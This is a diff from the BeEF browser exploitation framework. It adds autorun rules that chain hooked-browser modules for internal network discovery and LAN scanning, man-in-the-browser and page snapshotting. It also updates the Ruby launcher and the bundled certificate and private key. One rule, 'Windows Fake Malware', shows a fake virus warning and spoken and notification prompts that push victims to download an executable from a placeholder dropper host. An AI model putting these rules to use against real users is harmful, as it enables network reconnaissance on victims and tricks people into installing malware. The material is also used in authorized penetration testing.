        "ipRange":"<<mod_input>>",
        "ports":"80,8080",
        "threads":"3",
        "wait":"5",
        "timeout":"10"
      }
    }
  ],
  "execution_order": [0, 1],
  "execution_delay": [0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/lan_fingerprint_common.json
+++ b/arerules/lan_fingerprint_common.json
@@ -0,0 +1,23 @@
 {"name": "LAN Fingerprint (Common IPs)",
  "author": "antisnatchor",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "internal_network_fingerprinting",
      "condition": null,
      "code": null,
      "options": {
        "ipRange":"common",
        "ports":"80,8080",
        "threads":"3",
        "wait":"5",
        "timeout":"10"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/lan_flash_scan.json
+++ b/arerules/lan_flash_scan.json
@@ -0,0 +1,27 @@
 {"name": "LAN Flash Scan",
  "author": "bcoles",
  "browser": ["FF", "C"],
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_internal_ip_webrtc",
      "condition": null,
      "code": null,
      "options": {}
    },
    {"name": "cross_origin_scanner_flash",
      "condition": "status==1",
      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
      "options": {
        "ipRange":"<<mod_input>>",
        "ports":"80,8080",
        "threads":"2",
        "timeout":"5"
      }
    }
  ],
  "execution_order": [0, 1],
  "execution_delay": [0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/lan_flash_scan_common.json
+++ b/arerules/lan_flash_scan_common.json
@@ -0,0 +1,22 @@
 {"name": "LAN Flash Scan (Common IPs)",
  "author": "bcoles",
  "browser": ["FF", "C"],
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "cross_origin_scanner_flash",
      "condition": null,
      "code": null,
      "options": {
        "ipRange":"common",
        "ports":"80,8080",
        "threads":"2",
        "timeout":"5"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/lan_http_scan.json
+++ b/arerules/lan_http_scan.json
@@ -0,0 +1,28 @@
 {"name": "LAN HTTP Scan",
  "author": "bcoles",
  "browser": ["FF", "C"],
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_internal_ip_webrtc",
      "condition": null,
      "code": null,
      "options": {}
    },
    {"name": "get_http_servers",
      "condition": "status==1",
      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
      "options": {
        "rhosts":"<<mod_input>>",
        "ports":"80,8080",
        "threads":"3",
        "wait":"5",
        "timeout":"10"
      }
    }
  ],
  "execution_order": [0, 1],
  "execution_delay": [0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/lan_http_scan_common.json
+++ b/arerules/lan_http_scan_common.json
@@ -0,0 +1,23 @@
 {"name": "LAN HTTP Scan (Common IPs)",
  "author": "bcoles",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_http_servers",
      "condition": null,
      "code": null,
      "options": {
        "rhosts":"common",
        "ports":"80,8080",
        "threads":"3",
        "wait":"5",
        "timeout":"10"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/lan_ping_sweep.json
+++ b/arerules/lan_ping_sweep.json
@@ -0,0 +1,25 @@
 {"name": "LAN Ping Sweep",
  "author": "bcoles",
  "browser": "FF",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_internal_ip_webrtc",
      "condition": null,
      "code": null,
      "options": {}
    },
    {"name": "ping_sweep",
      "condition": "status==1",
      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
      "options": {
        "rhosts":"<<mod_input>>",
        "threads":"3"
      }
    }
  ],
  "execution_order": [0, 1],
  "execution_delay": [0, 0],
  "chain_mode": "nested-forward"
 }
--- a/arerules/lan_ping_sweep_common.json
+++ b/arerules/lan_ping_sweep_common.json
@@ -0,0 +1,20 @@
 {"name": "LAN Ping Sweep (Common IPs)",
  "author": "bcoles",
  "browser": "FF",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "ping_sweep",
      "condition": null,
      "code": null,
      "options": {
        "rhosts":"common",
        "threads":"3"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/man_in_the_browser.json
+++ b/arerules/man_in_the_browser.json
@@ -0,0 +1,17 @@
 {"name": "Perform Man-In-The-Browser",
  "author": "mgeeky",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "man_in_the_browser",
      "condition": null,
      "code": null,
      "options": {}
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/raw_javascript.json
+++ b/arerules/raw_javascript.json
@@ -0,0 +1,19 @@
 {
  "name": "Raw JavaScript",
  "author": "wade@bindshell.net",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "raw_javascript",
      "condition": null,
      "options": {
         "cmd": "alert(0xBeEF);"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/record_snapshots.json
+++ b/arerules/record_snapshots.json
@@ -0,0 +1,19 @@
 {"name": "Collects multiple snapshots of the webpage within Same-Origin",
  "author": "mgeeky",
  "browser": ["FF", "C", "O", "IE", "S"],
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "spyder_eye",
      "condition": null,
      "options": {
        "repeat":"10",
        "delay":"3000"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
 }
--- a/arerules/win_fake_malware.json
+++ b/arerules/win_fake_malware.json
@@ -0,0 +1,38 @@
 // note: update your dropper URL (dropper.local) in each of the modules below
 {
  "name": "Windows Fake Malware",
  "author": "bcoles",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "Windows",
  "os_version": "ALL",
  "modules": [
    {
      "name": "blockui",
      "condition": null,
      "options": {
        "message": "<img src='data:image/png;base64,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'/><p>This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer before you do any shopping online. <p><a href='http://dropper.local/malware_removal_tool.exe' onclick='$j.unblockUI();'>Microsoft Malware Removal Toolkit</a></p>",
        "timeout": "9999"
      }
    },
    {
      "name": "text_to_voice",
      "condition": null,
      "options": {
        "message": "This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer; before you do any shopping online.",
        "language": "en"
      }
    },
    {
      "name": "fake_notification_ie",
      "condition": null,
      "options": {
        "url": "http://dropper.local/malware_removal_tool.exe",
        "notification_text": "SECURITY WARNING: Download the <a href='http://dropper.local/malware_removal_tool.exe' title='Microsoft Malware Removal Toolkit'>Microsoft Malware Removal Toolkit</a> as soon as possible."
      }
    }
  ],
  "execution_order": [0,1,2],
  "execution_delay": [0,0,0],
  "chain_mode": "sequential"
 }
--- a/202
+++ b/202
@@ -1,55 +1,89 @@
 #!/usr/bin/env ruby
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-# stop deprecation warning from being displayed
+#
 # @note stop deprecation warning from being displayed
 #
 $VERBOSE = nil
-# @note Version check to ensure BeEF is running Ruby 1.9 >
+#
-if  RUBY_VERSION < '1.9'
+# @note Version check to ensure BeEF is running Ruby 2.4+
-  puts "\n"
+#
-  puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
+if RUBY_VERSION < '2.4'
-  puts "OSX:"
+  puts
-  puts "See Readme"
+  puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.4 or later."
-  puts "\n"
+  puts
-  exit
+  exit 1
 end
-$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '.'))
+#
-$root_dir = File.expand_path('..', __FILE__)
+# @note Platform check to ensure BeEF is not running on Windows
-
+#
-# @note Prevent some errors on encoding: encoding handling changed (improved) from 1.8.7 to 1.9.1/2.
+if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
-if RUBY_VERSION =~ /1.9/
+  puts
-  Encoding.default_external = Encoding::UTF_8
+  puts "Ruby platform #{RUBY_PLATFORM} is no longer supported."
-  Encoding.default_internal = Encoding::UTF_8
+  puts
  exit 1
 end
 #
 # @note set load path, application root directory and user preferences directory
 #
 $root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '.')
 $:.unshift($root_dir)
 $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
 #
 # @note Require core loader's
 #
 require 'core/loader'
-# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
+#
 # @note Check the system language settings for UTF-8 compatibility
 #
 env_lang = ENV['LANG']
 if env_lang !~ /(utf8|utf-8)/i
  print_warning "Warning: System language $LANG does not appear to be UTF-8 compatible."
  if env_lang =~ /\A([a-z]+_[a-z]+)\./i
    country = $1
    print_more "Try: export LANG=#{country}.utf8"
  end
 end
 #
 # @note Initialize the Configuration object. Loads a different config.yaml if -c flag was passed.
 #
 if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
  config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
 else
-  config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
+  config = BeEF::Core::Configuration.new("#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
 end
 #
 # @note After the BeEF core is loaded, bootstrap the rest of the framework internals
 #
 require 'core/bootstrap'
 #
 # @note Loads enabled extensions
 #
 BeEF::Extensions.load
 #
 # @note Prints the BeEF ascii art if the -a flag was passed
 #
 if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
  BeEF::Core::Console::Banners.print_ascii_art
 end
 #
 # @note Check if port and WebSocket port need to be updated from command line parameters
 #
 unless BeEF::Core::Console::CommandLine.parse[:port].empty?
  config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
 end
@@ -58,16 +92,24 @@ unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
  config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
 end
 #
 # @note Prints BeEF welcome message
 #
 BeEF::Core::Console::Banners.print_welcome_msg
 #
 # @note Loads enabled modules
 #
 BeEF::Modules.load
-# @note Disable reverse dns
+#
 # @note Disable reverse DNS
 #
 Socket.do_not_reverse_lookup = true
 #
 # @note Database setup - use DataMapper::Logger.new($stdout, :debug) for development debugging
 #
 case config.get("beef.database.driver")
  when "sqlite"
    DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
@@ -83,59 +125,121 @@ case config.get("beef.database.driver")
    )
  else
    print_error 'No default database selected. Please add one in config.yaml'
    exit 1
 end
-# @note Resets the database if the -x flag was passed
+#
-if BeEF::Core::Console::CommandLine.parse[:resetdb]
+# @note Load the database
-  print_info 'Resetting the database for BeEF.'
+#
-  DataMapper.auto_migrate!
+begin
-else
+  # @note Resets the database if the -x flag was passed
-  DataMapper.auto_upgrade!
+  if BeEF::Core::Console::CommandLine.parse[:resetdb]
    print_info 'Resetting the database for BeEF.'
    DataMapper.auto_migrate!
  else
    DataMapper.auto_upgrade!
  end
 rescue => e
  print_error "Could not connect to database: #{e.message}"
  if config.get("beef.database.driver") == 'sqlite'
    print_more "Ensure the #{config.get("beef.database.db_file")} database file is writable"
  end
  exit 1
 end
 #
 # @note Extensions may take a moment to load, thus we print out a please wait message
 #
 print_info 'BeEF is loading. Wait a few seconds...'
 #
 # @note Execute migration procedure, checks for new modules
 #
 BeEF::Core::Migration.instance.update_db!
 #
 # @note Create HTTP Server and prepare it to run
 #
 http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare
 #
 # @note Prints information back to the user before running the server
 #
 BeEF::Core::Console::Banners.print_loaded_extensions
 BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes
-#@note Prints the API key needed to use the RESTful API
+#
 # @note Create ~/.beef/
 #
 begin
  FileUtils.mkdir_p($home_dir) unless File.directory?($home_dir)
 rescue => e
  print_error "Could not create '#{$home_dir}': #{e.message}"
 end
 #
 # @note Check whether we load the Console Shell or not
 #
 if config.get("beef.extension.console.shell.enable") == true
  print_error "The console extension is currently unsupported."
  print_more "See issue #1090 - https://github.com/beefproject/beef/issues/1090"
 end
 #
 # @note Exit on default credentials
 #
 if config.get("beef.credentials.user").eql?('beef') && config.get("beef.credentials.passwd").eql?('beef')
  print_error "ERROR: Default username and password in use!"
  print_more "Change the beef.credentials.passwd in config.yaml"
  exit 1
 end
 #
 # @note Validate beef.http.public and beef.http.public_port
 #
 unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
  exit 1
 end
 unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
  exit 1
 end
 #
 # @note Prints the API key needed to use the RESTful API
 #
 print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
-#@note Starts the WebSocket server
+#
-if config.get("beef.http.websocket.enable")
+# @note Load the GeoIP database
-  BeEF::Core::Websocket::Websocket.instance
+#
-  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+BeEF::Core::GeoIp.instance
  if config.get("beef.http.websocket.secure")
    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
  end
 end
 #
 # @note Call the API method 'pre_http_start'
 #
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
-# @note Start the HTTP Server, we additionally check whether we load the Console Shell or not
+#
-if config.get("beef.extension.console.shell.enable") == true
+# @note Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
-  require 'extensions/console/shell'
+#
-  puts ""
+BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory
-  begin
+
-    FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
+#
-    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
+# @note Start the WebSocket server
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
+#
-  rescue Interrupt
+if config.get("beef.http.websocket.enable")
-  end
+  BeEF::Core::Websocket::Websocket.instance
-else
+  BeEF::Core::Console::Banners.print_websocket_servers
  print_info 'BeEF server started (press control+c to stop)'
  http_hook_server.start
 end
 #
 # @note Start HTTP server
 #
 print_info 'BeEF server started (press control+c to stop)'
 http_hook_server.start
--- a/beef_cert.pem
+++ b/beef_cert.pem
@@ -1,19 +1,24 @@
 -----BEGIN CERTIFICATE-----
-MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
+MIIECTCCAnGgAwIBAgIUbx/YybkSOL8uO0qikl/wsL4xLeIwDQYJKoZIhvcNAQEL
-VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
+BQAwFDESMBAGA1UEAwwJbG9jYWxob3N0MB4XDTE5MDIxNjEzMjYxNFoXDTI5MDIx
-BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
+MzEzMjYxNFowFDESMBAGA1UEAwwJbG9jYWxob3N0MIIBojANBgkqhkiG9w0BAQEF
-bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
+AAOCAY8AMIIBigKCAYEAteQJ2fooOffGU8jFkArCsFaJZW5WSuc5j7i2ciG0LY2C
-dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
+lVg1Uy7/6xHe048RJAD9AnWajf9Jt7NpAAoyRmFJOepZS8CStON4mBrKUFI4rzAB
-BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
+W9F7nov5+k+GK11kuvPFyAQCGs82RpGXsEP2ktsimsWvI8jnt7B+DXltqxeWavXB
-MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
+TYOTsDhyRxXcNPGgenOabtya1XsAecTs4JPOsV4L/hnTS70X8BNOcMRFRNb3W5C0
-eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
+w3vnid9Q6jhDRC6ghpeVWgnlymqV0Y6v1pbWZRs71sKQF/V5Td5zA8pr9r30YFAD
-cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
+Wbkb33vicU5BkZ8PQeUygqtqKOhni9i8Yg1otkXmqWsmo5sV/GgKHvkxOoQBlzv3
-VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
+hhMyYEnKjhPuepKl/VW17zRFdMCQZbvtW9/WBX4AwtKNAxYiRRO5jvDU1pX0nfXw
-0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
+86ZPfkbkPdJJYqZqqsOSSOVSpCkoLJv/owaY10XwgSEl8rA+3t03/9B6s09Q0o28
-F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
+0zXu/CMiSBNSEJlJSNdZAgMBAAGjUzBRMB0GA1UdDgQWBBTULhamHun+PWMkHDzg
-kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
+5yHcv0KOmTAfBgNVHSMEGDAWgBTULhamHun+PWMkHDzg5yHcv0KOmTAPBgNVHRMB
-kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
+Af8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBgQAZo9xPTktJ1aTxTXfLKivqbPin
-B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
+5CiRl5DWh1niPUFowmuAGbDCYOHA/+fzhBhFWj3LVaX2dQSpYxiqnfb5FWaxNK+8
-JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
+9A0AKgf8f2cpJ22QleDFOsyCw8jxzSfmOKKQLifY5Ty5C5P8xb9T0B7LbyR8r17p
-GkY0IBg9+j6XX4JwEXxCGt0a
+sr77eM/5tBpsIIh40AZjoDhi/HHrtqxEb+DgnTRHIBMmzvwkk+v4iXBDCO5BHFof
 gVXOF3MrovhH+qA8HFl9diJ6MtTltVAqI0eShBLd2MJ068qKqb+I6pyXGmlrk9Ei
 H0XrKlKEKjyum6ZEPr5Mn+NA+4ePRv1mPHoaopJoNhgRislfryGFLJwxeuMJfQOU
 oZTmgK8Ur0TYLl/wqf9avX3A8hkffNZXukmzNwjzLVG252RPA2Iq3y1+7VgOjaBJ
 rNbwArYInhfF5hJesjo3LAD9H29dFxR6dztpOcDCkaOZEdlz+fvqUFYJzwuHmuSi
 DLyqAOr77CjoWEMSHcXUEGUeJDKVqLgzqC9lqf4=
 -----END CERTIFICATE-----
--- a/beef_key.pem
+++ b/beef_key.pem
@@ -1,16 +1,40 @@
 -----BEGIN PRIVATE KEY-----
-MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
+MIIG/gIBADANBgkqhkiG9w0BAQEFAASCBugwggbkAgEAAoIBgQC15AnZ+ig598ZT
-X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
+yMWQCsKwVollblZK5zmPuLZyIbQtjYKVWDVTLv/rEd7TjxEkAP0CdZqN/0m3s2kA
-KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
